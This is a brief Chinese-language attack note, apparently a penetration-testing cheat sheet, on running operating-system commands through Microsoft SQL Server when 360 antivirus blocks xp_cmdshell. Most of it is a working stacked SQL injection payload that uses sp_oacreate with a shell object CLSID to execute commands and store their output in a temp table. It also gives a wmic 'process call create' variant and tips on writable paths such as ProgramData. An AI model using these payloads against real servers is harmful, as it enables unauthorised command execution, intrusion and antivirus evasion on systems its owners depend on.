目标有360,绕过xp_cmdshell的方式
create table temp
(output varchar(8000));

;declare @luan int,@exec int,@text int,@str varchar(8000);exec sp_oacreate ‘{72C24DD5-D70A-438B-8A42-98424B88AFB8}’,@luan output;exec sp_oamethod @luan,’exec’,@exec output,’C:\Windows\System32\ipconfig /all’;exec sp_oamethod @exec, ‘StdOut’, @text out;exec sp_oamethod @text, ‘readall’, @str out;select @str;insert into temp values(cast(@str as varchar(8000)));–

select * from temp;
drop table temp;

将其中payload换成wmic process call create “cmd /c whoami > C:\Users\vmware\a.t”注意这里的第二个路径一定要写有权限的绝对路径,否则环境是用的wmic路径,一般来说你没权限

2008R2下sqlserver权限试试ProgramData文件夹